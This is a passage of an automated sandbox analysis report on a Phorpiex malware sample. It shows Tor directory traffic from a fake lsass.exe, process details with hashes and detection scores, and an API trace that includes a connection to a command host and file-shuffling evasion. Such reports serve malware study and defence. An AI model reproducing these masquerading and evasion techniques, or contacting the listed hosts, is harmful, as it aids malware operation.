8b 1f e3 00 42 0f 0b 9b e0 88 bc 9d 70 b9 7d 1c f6 38 6b 61 fa 07 f2 b0 1f 2d 4b 36 5f 8e af 5d c9 4f 1c 8b a1 b8 64 99 d0 92 7e 0d fe fd e6 9d 5e ae b1 Data Ascii: xis?HH&sx4h~D3A7lluWweYMsky,"r#%fevrs/=S}vJP$ ;$IRDyyy>~~P$>qO/z\|C}Caa;D/wws/%)?8fXyEH^ozBO-)~JL\|YV4V-J"ELhn6VhIl(^$Jm3>//+ I<60#;"K7?uQ/tf[/]o_K[f7}?C\|~~~z^&UWy6SfWL_wIfFW5X{yz.HG^1Mkd=e-,9FLSdohD}EGGR-a0PFm![h#s#3!28MWqm87@Xg,^m:2q[L5MiU]tYFNzN_(1S_Q~5(C"F=:Q!Wv=?v<Gn?y>\|DhW?>@A0a\ok(-tE~]fF!+~9!\DOzZ}KKAs{xM~~X@'{%h)[fyjc~C&6lLtB?%NI['W/[2O=Y Bp}8ka-K6_]Od~^
Jan 10, 2024 15:41:30.905858994 CET	714	IN	Data Raw: 97 37 e2 09 d5 3f 9c af fc 52 df 4b 66 34 3c e7 fa cc da f9 c9 ac 08 b9 de 59 e0 6f b6 21 6e 0d 76 65 eb 87 8d 31 f8 f7 bf b0 9d b3 b8 40 9f 9e b0 f0 55 11 19 76 ea 12 24 45 53 62 57 20 81 4c 03 91 84 aa 2a f0 90 67 04 06 fd 4e 92 38 96 22 15 28 Data Ascii: 7?RKf4<Yo!nve1@Uv$ESbW LgN8"(3z2,D/'ibdscCWsd.UTYJbV, r#R,d@+32zBVR9+D^R/>1hrnlm[O>)I,I
Jan 10, 2024 15:41:30.905956030 CET	1286	IN	Data Raw: 3f ec 14 59 91 ea ff bf ff 64 ba 11 e7 ba 6b 3f c5 e8 18 8a 34 ec 78 79 9e 64 9d 76 fb db 03 e8 a4 11 28 fa 8a 9d 4e 91 fa 5f d2 4c 27 74 03 f9 f7 4e 7d fb ea 0d f0 f3 f2 d2 47 bb 77 da 41 97 e8 31 46 c1 15 da 80 fc 2c 7b 71 b8 1d ea 8d 41 b8 2e Data Ascii: ?Ydk?4xydv(N_L'tN}GwA1F,{qA.t$S]EI@Q8e~;<1*$-I,`S,)2N;@$!]b!]<JHMhX 3]8g<H42/S'3"ZBh6\|="\|_wK(5=omeZ
Jan 10, 2024 15:41:30.906059027 CET	1286	IN	Data Raw: fc 30 00 c9 82 2a d4 d3 a0 7e 11 21 ca 8b 59 55 e5 ab ed 79 25 c1 bd 35 b5 54 9a d5 2f e3 90 5d ab c4 62 96 0e a3 1d 1d 44 3a b3 3d f9 2b ee 6a 38 5b 5e cb d2 ab b1 7e e3 16 e8 0e 60 3a 14 8a e0 70 06 83 72 33 1a 05 ec dc f7 6d ef 8f 1a f3 93 7b Data Ascii: 0*~!YUy%5T/]bD:=+j8[^~`:pr3m{R1II6Q)N,x5M_Xf#oZ[A.zfpiv&?6\|7NjQ19Wvn!8='mKL7ehY{+s
Jan 10, 2024 15:41:30.906147003 CET	1286	IN	Data Raw: 4b c5 e1 25 13 17 95 da b8 2a 90 b3 a1 d0 55 01 d1 e6 c8 d7 7b 24 a4 08 fe 4d ed ed 07 6d fa be 06 f1 89 6c ca 7e 68 d2 3e 7a 42 16 3b bd 38 b4 b4 04 c5 d2 83 b1 1a c8 63 d1 5d 82 ee de 05 28 05 d6 07 53 7b c4 16 91 4a cc 17 82 db 77 26 ed 70 53 Data Ascii: K%*U{$Mml~h>zB;8c](S{Jw&pS]SPkj?\|pgjv_-v`1^Gpw.%5U7Un\|By-lW.s%p\abs;SY."ikf1-Yp}uZ@Z+<Kimn
Jan 10, 2024 15:41:30.906213045 CET	1286	IN	Data Raw: 76 f8 0e 60 d1 2a a6 4c a3 d3 41 d1 27 7e fc 41 9b 3c d8 67 fc 56 d3 93 41 21 e2 b4 2a d2 23 b3 2e 2b 77 c8 b4 9d 89 d6 1e 9d da bd 23 bf d1 78 22 3f f3 89 30 b8 1d 25 6d b9 74 33 5f 3d ba 56 dc 0d f7 74 9e 0f 1a 19 00 8a 12 19 e1 6d d3 13 c2 7b Data Ascii: v`LA'~A<gVA!#.+w#x"?0%mt3_=Vtm{MO=O+8bl*qS,GZuES .9Z61E!OeOS7fQXvbq,.\|SmOxNE%3%v~_vRlfA(F
Jan 10, 2024 15:41:30.906321049 CET	1286	IN	Data Raw: 72 29 db 24 a1 24 c6 d6 1a 94 de 4d b7 9d 7c 73 34 e7 bb a9 d2 3f 6e 99 ca 6b 42 94 f1 44 27 4f e0 71 16 9c c5 62 2e 35 e1 85 01 e2 a1 73 1b e6 7f 18 d6 e1 5b be 65 5b 7e ee d9 26 b2 88 ef a2 b3 e7 40 65 6a 1a e9 a8 55 04 97 8a 17 06 d4 b4 47 1d Data Ascii: r)$$M\|s4?nkBD'Oqb.5s[e[~&@ejUGB.s4_L&N>fe$qJAb"g:`*F^$Mmfb^bg5A,!e?\|^e>NF >1n`q
Jan 10, 2024 15:41:30.906405926 CET	1286	IN	Data Raw: cd e2 9c d9 32 71 53 15 23 e4 f1 80 98 03 99 17 e8 e9 43 16 87 e9 7b cd 0f a5 bb 1c 60 c6 08 e7 30 48 05 87 bf c6 0c d3 6d 2f 32 1e 4c f8 ab 35 4b e6 8e 4a 9c e1 5e c9 58 37 3d 46 dd 60 32 1c ae f7 28 75 de 26 4b aa 1c ef 9b c2 3c 68 11 b3 af 05 Data Ascii: 2qS#C{`0Hm/2L5KJ^X7=F`2(u&K<h&M,fv:y<o%_+NB=g!:hYh$h}ie{2_rIWov g4:jezb\|L$*.#)7!
Jan 10, 2024 15:41:30.906492949 CET	1286	IN	Data Raw: 94 dc e7 ec 9d 22 54 f4 d0 57 9b 2e 5a e8 20 8f 50 c3 54 79 cc 11 f1 c4 53 04 4d d3 f4 e3 28 aa 02 ea fe bc 47 cd b4 54 d9 53 3b 2f e3 34 40 26 ad d4 7e f7 46 a7 74 7f 39 19 ce 00 3d 04 16 99 4f a9 65 02 09 f9 b2 b1 dc 8b 72 9c 6e a4 64 aa 9f 93 Data Ascii: "TW.Z PTySM(GTS;/4@&~Ft9=Oerndv 0{OtJX6'w?af?a;v9O(&U:MH-~biYhyCFZ4M1`T03w`snjbH+1{].]BO5:ERu
Jan 10, 2024 15:41:30.906559944 CET	1286	IN	Data Raw: fa 15 99 6a 72 28 6c a0 71 e8 d0 61 28 e1 b1 03 05 ac 10 f1 21 f5 ac 7e ca f5 14 d9 dc f0 4a a0 0d e8 9b b6 56 e7 fb f4 9a c4 b7 43 16 fa 63 d5 24 54 b0 f1 40 69 8d 00 2f 4d 38 e9 38 cb 86 29 9f 70 fa 30 54 f9 66 fc 0b 91 21 eb 69 23 4c 63 c0 30 Data Ascii: jr(lqa(!~JVCc$T@i/M88)p0Tf!i#Lc0IarP$Is<I2[x]0X}rf{r[IK_Iu?.G*Y;rx=Y\4zX++uqq<dAg{wnE5.O}{
Jan 10, 2024 15:41:31.013118029 CET	1286	IN	Data Raw: 37 3a 2e 24 b7 dc d8 86 ee 46 36 ef 54 e1 20 4c db 3b 71 05 38 c0 89 c4 ca b6 04 a5 ab 4e 9d 55 72 cc d6 ac 10 2a d7 c5 20 77 fb 5a ba 7f af e3 02 49 9c dc 0b e0 89 67 51 6c ff b1 92 0b a5 53 ff 27 94 5c 1a f3 6b 1f 4a b9 4c 63 c3 a8 08 11 48 e3 Data Ascii: 7:.$F6T L;q8NUr* wZIgQlS'\kJLcH_UsrkJDHgFOqdeH8e8H(N\q9'3XBgEjw}Z++F:yOn4M1I4[vzdvy9k5a'+;9"aMvx1u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49757	149.56.45.200	9030	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:41:38.903876066 CET	782	OUT	GET /tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z HTTP/1.1 Accept-Encoding: gzip Host: 149.56.45.200:9030 Connection: Close Cache-Control: no-cache
Jan 10, 2024 15:41:39.038306952 CET	1286	IN	HTTP/1.0 200 OK Date: Wed, 10 Jan 2024 14:41:38 GMT Content-Type: text/plain X-Your-Address-Is: 102.165.48.42 Content-Encoding: deflate Pragma: no-cache Data Raw: 38 cb 94 55 59 93 a2 4c d6 be e7 57 70 d1 17 33 af 63 99 99 90 24 d9 11 15 31 c9 a6 28 82 fb f6 c5 77 81 80 88 22 20 8b a8 bf 7e b0 6a de 6e aa a7 63 16 35 d2 b3 71 92 f3 9c 93 4f e6 69 55 06 39 6f e4 41 a0 df a3 92 87 84 be 89 c2 1b c4 f4 0d 52 89 a7 00 40 1e f0 80 8b fc 20 29 a3 f2 d1 0d 7c 84 31 a4 5c f7 f5 51 f4 be 69 f3 ba f6 61 e2 55 7d b6 f8 30 73 6c 3a 65 ca f3 3e 64 fe 1d 2c 06 7d 93 44 60 b1 37 ef c7 7e 50 5b 22 5d 7a 05 d8 6d 03 24 9f ca fd d9 64 53 67 1b c9 ab 1d 9b b2 50 61 9a b5 8f 08 e1 0e cf 19 55 4a c7 1a 6b 6a 88 d0 11 3e a5 60 6b 38 ae 9e 24 47 e5 06 8d 7c b8 91 1e e6 21 b4 9e 0a 1e 77 c8 6d d8 bf 6e b7 a3 18 a4 d3 be 32 3d ce 9e 05 f7 48 aa 42 cc cb 7a d0 1b 65 07 47 3b d7 fb 59 f6 c8 b2 ac 7a 3c 9c c5 d1 d6 6d b6 d9 99 07 6b b9 3a 4b 30 c4 97 d9 76 67 2f ec ce 5d 04 e1 f4 fd b3 36 dd d6 7e 53 d9 c5 2d 1a bc ba e7 e0 07 12 fc 03 89 55 47 90 c1 61 ba 5f 44 4f 56 a7 76 99 fa 5e 27 b9 28 8b cb 71 88 c5 e9 9e ce dc c7 aa 53 44 3a 97 c5 6e 79 48 f3 0b bf 48 73 1e bc 89 6f e4 0d 0a 7c 9a f0 56 94 54 77 2e cb d3 32 e5 d5 34 29 de 61 17 f1 5a 50 78 9f 42 94 ab ae 77 0c de 11 6f c4 69 ad 96 79 fc 61 1f cc 1b cf fb eb df 4c ca 3c 7d 17 bb b8 91 67 41 e2 7f b8 9b a4 e7 46 c0 1f 02 ab ca e3 3b fc 9b c0 8f 23 2f 4f fd 3f 53 4f 5c df 8f 92 b0 49 32 0b 62 f7 d1 d8 44 2e ab f6 71 54 1c 03 9f 47 00 89 5d 00 bb 80 36 e2 77 28 7f 17 25 ee d0 84 07 79 96 47 49 c9 03 03 aa bc 0c 25 99 d7 0c 0d f0 8c 69 0a af 4b 50 e1 35 02 21 4f 45 4d e0 89 2a 4b 3c 31 74 8d c7 0c 41 ae ca ca e8 12 f0 50 c0 12 86 12 e1 f6 6e e2 d7 91 5f 1e 79 08 88 40 44 28 23 b1 2d ca 12 82 22 15 b8 e0 5e e6 6e 37 4a 0e 69 d7 8f c2 a0 28 79 15 00 95 48 00 4b 8a c1 64 43 87 b2 a6 13 15 13 1d 33 8d 51 4d 55 14 99 4a f4 b5 79 e2 e0 78 1f 69 d1 6a 95 c7 fa 58 99 0e dc 12 0e 58 d8 c3 4a 75 dd 4d f2 d5 aa 23 d3 d2 94 47 87 9b ce a5 49 94 26 af f6 b6 07 7c 36 67 fc 64 a9 58 a6 ca 8f f4 ed e7 20 8c cd fe 90 a5 7d 85 8d 3c 6d 40 c6 60 5d dc 66 3d a9 74 86 fb e1 01 2b 69 2f db 9f 1d b1 27 af 01 a6 31 d0 3a f9 ac 03 c7 7a 5e 5a b6 f8 e8 48 65 38 e1 36 c2 78 04 4f ae 0c 1f 19 8b 87 b5 b0 8a 7c 6d 32 1f 44 7d ef 2a e4 ea 00 62 09 a8 e3 dd ed 9e 5d 66 68 ac 3a fb 70 d0 9b c5 42 78 b4 fa be d8 bb 13 cc 29 e2 3a 49 fb b6 b1 61 62 3e 21 a6 57 9c 9c 95 1e a4 2c 37 eb 31 d2 ae 01 8d d9 1d cb 42 74 98 59 9d 6c d2 89 16 8a a7 b0 70 ac 30 a6 b7 46 fc 77 b5 15 51 98 34 4d fe 1f 61 28 27 fe 89 7a 91 b5 f0 c8 8e 38 fa f4 b0 ab 35 9a eb cb 5a 9d cf 07 4a 8a e2 e9 60 bc 11 67 cb f8 7c 76 6e b9 5e cf 09 5b 48 5c df 58 09 41 71 ac 8d da 99 2d f3 9e 0c e3 24 23 e1 ee 6a 94 a9 b8 36 cb b8 0f 6b 38 9f da 99 3d 57 42 e2 d1 64 ea 6a 66 1d 55 67 3f 72 b0 78 9b d4 5c e5 0a d7 7c 99 e8 05 19 3b e6 64 e1 f6 c9 70 30 d2 dd 85 ac 74 96 ce c8 5e ba a3 7c 39 b5 43 54 eb c2 c4 62 db 42 96 53 f8 df c1 f0 63 16 ba cd 81 29 0a 2f c8 cb 36 1c ea cc 99 cf 7f 32 c3 7c af 1e a8 be 17 d8 5e 35 03 95 5e 86 64 a5 54 b3 0c 66 d2 7c 50 5c 4f 30 0c b5 8a 58 7d 4a 7a d7 ca f4 ca 83 c9 4e d2 d2 59 63 62 eb d8 f6 4d 85 43 d6 63 96 5c 6b ed b1 c7 89 a6 0d 1c 7f 14 6b db d9 72 dd 89 ee 43 69 71 b9 ca 56 7e ba d8 13 9d 9c f3 b5 6a 60 f3 e8 1f ea 8a 1e 89 6a 7a 79 e8 9d 1f 5c f0 24 97 b9 7d 5b c7 55 b2 db 3e 77 f9 49 7b e8 e2 53 c7 fb 9b 2c 08 8b ed c1 db 16 cb 71 11 29 43 ba 6c 55 fe 4b 19 49 99 e6 dd df 54 ce c3 ff 44 f9 e9 8b f2 29 f3 ca ca ba 95 3d 7b 00 fa 40 2c ea f1 48 db bb 83 cd 24 c3 e1 12 a7 f3 e6 Data Ascii: 8UYLWp3c$1(w" ~jnc5qOiU9oAR@ )\|1\QiaU}0sl:e>d,}D`7~P["]zm$dSgPaUJkj>`k8$G\|!wmn2=HBzeG;Yz<mk:K0vg/]6~S-UGa_DOVv^'(qSD:nyHHso\|VTw.24)aZPxBwoiyaL<}gAF;#/O?SO\I2bD.qTG]6w(%yGI%iKP5!OEMK<1tAPn_y@D(#-"^n7Ji(yHKdC3QMUJyxijXXJuM#GI&\|6gdX }<m@`]f=t+i/'1:z^ZHe86xO\|m2D}b]fh:pBx):Iab>!W,71BtYlp0FwQ4Ma('z85ZJ`g\|vn^[H\XAq-$#j6k8=WBdjfUg?rx\\|;dp0t^\|9CTbBSc)/62\|^5^dTf\|P\O0X}JzNYcbMCc\kkrCiqV~j`jzy\$}[U>wI{S,q)ClUKITD)={@,H$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49760	86.59.21.38	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:41:39.929946899 CET	139	OUT	GET /tor/status-vote/current/consensus.z HTTP/1.1 Accept-Encoding: gzip Host: 86.59.21.38 Connection: Close Cache-Control: no-cache
Jan 10, 2024 15:41:40.637095928 CET	85	IN	HTTP/1.0 503 Directory busy, try again later Date: Wed, 10 Jan 2024 14:41:40 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49761	131.188.40.189	443	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:41:40.640779018 CET	146	OUT	GET /tor/status-vote/current/consensus.z HTTP/1.1 Accept-Encoding: gzip Host: 131.188.40.189:443 Connection: Close Cache-Control: no-cache

Target ID:	0
Start time:	15:37:55
Start date:	10/01/2024
Path:	C:\Users\user\Desktop\6K1uYM85lS.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\6K1uYM85lS.exe
Imagebase:	0x9a0000
File size:	114'688 bytes
MD5 hash:	2D5E7BABF1B2D92B56FDA0B9044F889A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:38:09
Start date:	10/01/2024
Path:	C:\180771693628709\lsass.exe
Wow64 process (32bit):	true
Commandline:	C:\180771693628709\lsass.exe
Imagebase:	0x770000
File size:	114'688 bytes
MD5 hash:	2D5E7BABF1B2D92B56FDA0B9044F889A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_Phorpiex, Description: Detects Phorpiex variants, Source: C:\180771693628709\lsass.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 72%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:38:20
Start date:	10/01/2024
Path:	C:\180771693628709\lsass.exe
Wow64 process (32bit):	true
Commandline:	"C:\180771693628709\lsass.exe"
Imagebase:	0x770000
File size:	114'688 bytes
MD5 hash:	2D5E7BABF1B2D92B56FDA0B9044F889A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:38:29
Start date:	10/01/2024
Path:	C:\180771693628709\lsass.exe
Wow64 process (32bit):	true
Commandline:	"C:\180771693628709\lsass.exe"
Imagebase:	0x770000
File size:	114'688 bytes
MD5 hash:	2D5E7BABF1B2D92B56FDA0B9044F889A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:38:38
Start date:	10/01/2024
Path:	C:\180771693628709\lsass.exe
Wow64 process (32bit):	true
Commandline:	"C:\180771693628709\lsass.exe"
Imagebase:	0x770000
File size:	114'688 bytes
MD5 hash:	2D5E7BABF1B2D92B56FDA0B9044F889A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	41.5%
Total number of Nodes:	884
Total number of Limit Nodes:	17

Executed Functions

Function 009B1360 Relevance: 936.9, APIs: 501, Strings: 33, Instructions: 2386filesleepnetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0,?,?,?,009B43AE,00000000,?,0000000A), ref: 009B1374
FindWindowA.USER32(f5d4s54s4sds5d5d5d,00000000), ref: 009B13A7
Sleep.KERNEL32(0000C350), ref: 009B13C5
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B13D0
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B13E0
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B1414
Sleep.KERNEL32(00000FA0), ref: 009B141F
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B142A
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B143A
Sleep.KERNEL32(00000FA0), ref: 009B1445
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B1450
Sleep.KERNEL32(00002710), ref: 009B145D
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1468
Sleep.KERNEL32(00001770), ref: 009B1473
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1483
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B148E
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B149E
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B14A9
Sleep.KERNEL32(00000BB8), ref: 009B14B4
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B14BF
Sleep.KERNEL32(00000BB8), ref: 009B14CA
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B14DA
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B14ED
DeleteFileW.KERNEL32(w4twywyw4yw4yw4yw4y), ref: 009B14FE
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1516
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1526
Sleep.KERNEL32(00001388), ref: 009B1531
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B153C
Sleep.KERNEL32(00000BB8), ref: 009B1547
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1552
InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 009B156C
Sleep.KERNEL32(000007D0), ref: 009B157D
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B15BD
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B15C8
Sleep.KERNEL32(000007D0), ref: 009B15D3
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B15E3
Sleep.KERNEL32(00000FA0), ref: 009B15EE
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B15F9
InternetCloseHandle.WININET(00000000), ref: 009B1608
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1613
Sleep.KERNEL32(00001B58), ref: 009B161E
InternetCloseHandle.WININET(00000000), ref: 009B162B
Sleep.KERNEL32(00002710), ref: 009B1636
ShowWindow.USER32(00000000,00000001), ref: 009B1645
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1650
SetForegroundWindow.USER32(00000000), ref: 009B165D
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1668
CloseWindow.USER32(00000000), ref: 009B1675
MoveFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff), ref: 009B1685
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B16CB
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B16D6
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B16E6
Sleep.KERNEL32(000007D0), ref: 009B16F1
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B16FC
DeleteFileA.KERNEL32(3r3hr8h38h8h38f8hff), ref: 009B1707
FindWindowA.USER32(3rvr3r3bru3urbu3rbub,00000000), ref: 009B1714
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B172D
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1750
Sleep.KERNEL32(000007D0), ref: 009B175B
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B176B
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1776
InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 009B1790
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B17AF
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B17BA
Sleep.KERNEL32(00001388), ref: 009B17C5
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,e5u5eue5ue5ue5ue5u), ref: 009B17D5
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B17E5
Sleep.KERNEL32(00000FA0), ref: 009B17F0
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B17FB
InternetCloseHandle.WININET(00000000), ref: 009B1808
Sleep.KERNEL32(00000DAC), ref: 009B1813
InternetCloseHandle.WININET(00000000), ref: 009B1820
Sleep.KERNEL32(00001388), ref: 009B182B
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1848
ShowWindow.USER32(00000000,00000000), ref: 009B1857
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1862
SetForegroundWindow.USER32(00000000), ref: 009B186F
Sleep.KERNEL32(00000DAC), ref: 009B187A
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B188D
InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 009B18BA
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B18D4
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B18E4
Sleep.KERNEL32(00000BB8), ref: 009B18EF
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B18FA
InternetCloseHandle.WININET(00000000), ref: 009B1907
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1912
Sleep.KERNEL32(00000064), ref: 009B191A
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B192A
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1935
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1945
DeleteFileA.KERNEL32(3r3hr8h38h8h38f8hff), ref: 009B1950
Sleep.KERNEL32(000007D0), ref: 009B195B
InternetCloseHandle.WININET(00000000), ref: 009B1968
FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 009B199B
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B19BA
Sleep.KERNEL32(000007D0), ref: 009B19C5
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B19D0
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B19E0
Sleep.KERNEL32(00001388), ref: 009B19EB
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B19F6
Sleep.KERNEL32(00001388), ref: 009B1A01
PathFileExistsA.SHLWAPI(3rvr3r3bru3urbu3rbub), ref: 009B1A20
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B1A2F
Sleep.KERNEL32(00000FA0), ref: 009B1A3A
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1A45
Sleep.KERNEL32(000001F4), ref: 009B1A50
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 009B1A60
FindWindowA.USER32(38fh83hf83hf83hf38h,00000000), ref: 009B1A6D
Sleep.KERNEL32(00001388), ref: 009B1A8B
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1A96
SetForegroundWindow.USER32(00000000), ref: 009B1AA3
Sleep.KERNEL32(000001F4), ref: 009B1AAE
ShowWindow.USER32(00000000,00000001), ref: 009B1ABD
Sleep.KERNEL32(00003A98), ref: 009B1AC8
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,3rvr3r3bru3urbu3rbub), ref: 009B1AD8
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B1AE3
ShowWindow.USER32(00000000,00000000), ref: 009B1AF2
Sleep.KERNEL32(000001F4), ref: 009B1AFD
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1B08
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1B3F
Sleep.KERNEL32(00001388), ref: 009B1B4A
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B1B5A
PathFileExistsW.KERNELBASE(w4tw4yw4yw4tw4t), ref: 009B1B67
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B1BA6
Sleep.KERNEL32(00001388), ref: 009B1BB3
FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 009B1BC0
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B1BDA
SetForegroundWindow.USER32(00000000), ref: 009B1BE7
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B1BF7
SetFocus.USER32(00000000), ref: 009B1C04
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1C0F
